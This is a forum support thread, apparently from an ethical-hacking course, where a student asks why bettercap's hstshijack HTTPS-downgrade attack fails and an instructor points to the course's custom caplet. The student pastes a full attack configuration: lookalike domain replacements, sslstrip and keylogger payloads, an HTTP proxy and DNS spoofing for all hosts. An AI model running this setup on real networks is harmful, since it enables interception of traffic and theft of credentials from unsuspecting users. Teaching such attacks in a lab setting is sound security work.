[lucmarrouche]

Hi,

I am having a hard time with downgrading https to http using HS…, the result says “not enough hstshijack replacements (got 9).

[Diego Pérez]

Hi!
Avoid asking the same in different threads please.

Can you share a screenshot of the error please?

Thanks!
Diego

[lucmarrouche]

Hello Diego and thank you so much for replying back, here are some pics of the process, these sites arent going from https to http.

[lucmarrouche]

here pic 2

[lucmarrouche]

and pic 3

[Diego Pérez]

Hi!
The screenshots weren’t uploaded, they are too big. They need to have a maximum size of 1MB. So try it again.

Greetings!
Diego

[lucmarrouche]

Hello Diego, did you receive the pics for the https to http, I am still trying to figure out why it isnt working, thank you

[Diego Pérez]

Hi!
As mentioned above they weren’t uploaded because they might exceed the 1MB limit size, so you need to resize them to be able to upload them. Otherwise upload them to google drive and share the link here.

Greetings!
Diego

[lucmarrouche]

Hi again,

Here is a better and more recent screen shot

[Diego Pérez]

Hi!
Unfortunately that screenshot is unreadable, it might be better to upload the to google drive and share a link here.

Greetings!
Diego

[lucmarrouche]

https://drive.google.com/file/d/1kfvGotn2r7YoKJqBPGouLF8I_-B2FlZL/view?usp=drivesdk

Is this working

[Diego Pérez]

Hi!
No, it doesn’t allow me to see it, change permissions of the file to Anyone who has the link.

Greetings!
Diego

[Diego Pérez]

Hi!
You need to share the info here in case someone else (I meant someone from zSecurity team) looks at your question. Just set the permissions as I mentioned above and we’ll be able to see it.

Greetings!
Diego

[lucmarrouche]

# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack

# Domains assigned to ‘hstshijack.targets’, ‘hstshijack.blockscripts’ and ‘hstshijack.payloads’
# variables get precendence over those assigned to the ‘hstshijack.ignore’ variable.
set hstshijack.targets google.com, *.google.com, gstatic.com, *.gstatic.com, linkedin.com, *.linkedin.com, instagram.com, *.instagram.com, twitter.com, *.twitter.com
set hstshijack.replacements google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
set hstshijack.ssl.domains /usr/share/bettercap/caplets/hstshijack/domains.txt
set hstshijack.ssl.index /usr/share/bettercap/caplets/hstshijack/index.json
set hstshijack.ssl.check true
#set hstshijack.blockscripts example.com,*.example.com
set hstshijack.obfuscate true
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js
set hstshijack.ignore captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com

set http.proxy.script /usr//share/bettercap/caplets/hstshijack/hstshijack.js
http.proxy on

set dns.spoof.domains google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
set dns.spoof.all true
dns.spoof on

[Diego Pérez]

Hi!
That looks like the original hstshijack caplet, as mentioned in the course you need to use the custom one or the attack won’t work. I suggest to download and import custom kali which already has the custom caplet. Then try the attack again.

Greetings!
Diego

[Author]

Posts